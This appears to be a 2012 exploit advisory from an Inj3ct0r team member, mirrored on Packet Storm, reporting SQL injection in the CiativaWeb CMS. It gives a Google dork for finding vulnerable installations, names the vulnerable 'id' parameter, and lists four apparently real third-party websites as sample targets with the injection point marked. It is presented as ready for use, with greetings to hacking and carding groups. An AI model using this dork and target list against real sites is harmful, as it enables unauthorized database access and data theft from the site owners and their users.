CiativaWeb suffers from a remote SQL injection vulnerability.
005aadf34edb6627e81b00cdf4a7dda90f10f10ef60a89ec43201b1e1fe83fcf 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1
0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» CiativaWeb - SQL Injection Vulnerability «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : CiativaWeb - SQL Injection Vulnerability
./CMS Developer : CiativaWeb - www.criativawebdesign.com
./Google Dork : inurl:"/index.php?acess=" &id=
./Author Exploit: [ TheCyberNuxbie ]
./Time & Date : June, 07 2012. 01:16 PM.
./Category XPL : [ WebApps/ZeroDay ]
./Security Risk : High Level.
./Exploit Tested: Back|Track 5.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Use it at your risk,,,
This was written for educational purpos,,,
Author will be not responsible for any damage. //nuxbie
[0x01] SQL injection is a code injection technique that exploits a security
vulnerability occurring in the database layer of an #application.
The vulnerability is present when user input is either incorrectly
filtered for string literal escape characters embedded in SQL #statements
or user input is not strongly typed and thereby unexpectedly executed.
- Affected items (SQLi):
http://127.0.0.1/webapps/index.php?acess=xxx&id=[SQLi]
- Sample WebApps Vuln (SQLi):
http://allikon.com.br/index.php?acess=5&id=7' + [SQL Injection]
http://tempoextra.com/index.php?acess=5&id=54' + [SQL Injection]
http://acessocar.com.br/index.php?acess=5&id=6' + [SQL Injection]
http://aplik.ind.br/site/index.php?acess=6&id=10' + [SQL Injection]
, And Many More @portofolio_webdevelop...!!!
- Special Thanks:
...:::' 1337day - Inj3ct0r TEAM ':::...
BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,,
, And All Inj3ct0r Fans & All Hacktivist,,,
#############################################################################
[ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | SekuritiOnline ]
[ Codenesia | ID-BackTrack | IndonesianCoder | IndonesianHacker | JatimCrew ]
[ E-C-H-O | ExploreCrew | Hacker-Newbie | Jasakom | YogyaCarderLink ./etc.. ]
-----------------------------------------------------------------------------
[ r0073r, Sid3^effects, r4dc0re, CrosS, SeeMe, indoushka, KnocKout, ZoRLu ]
[ anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, cr4wl3r, cyberlog ]
[ erytronic, team_elite, r4h0x, Hmei7, kaMtiEz, cyberbagor, SeekerUnZero ]
[ Dencowbie, Alex_Maxs, Afni Ramadhania, And All My Friends @it-underground ]
-=[ We Are c0d3rs And We Are An Exploit...!!! ]=-
#############################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed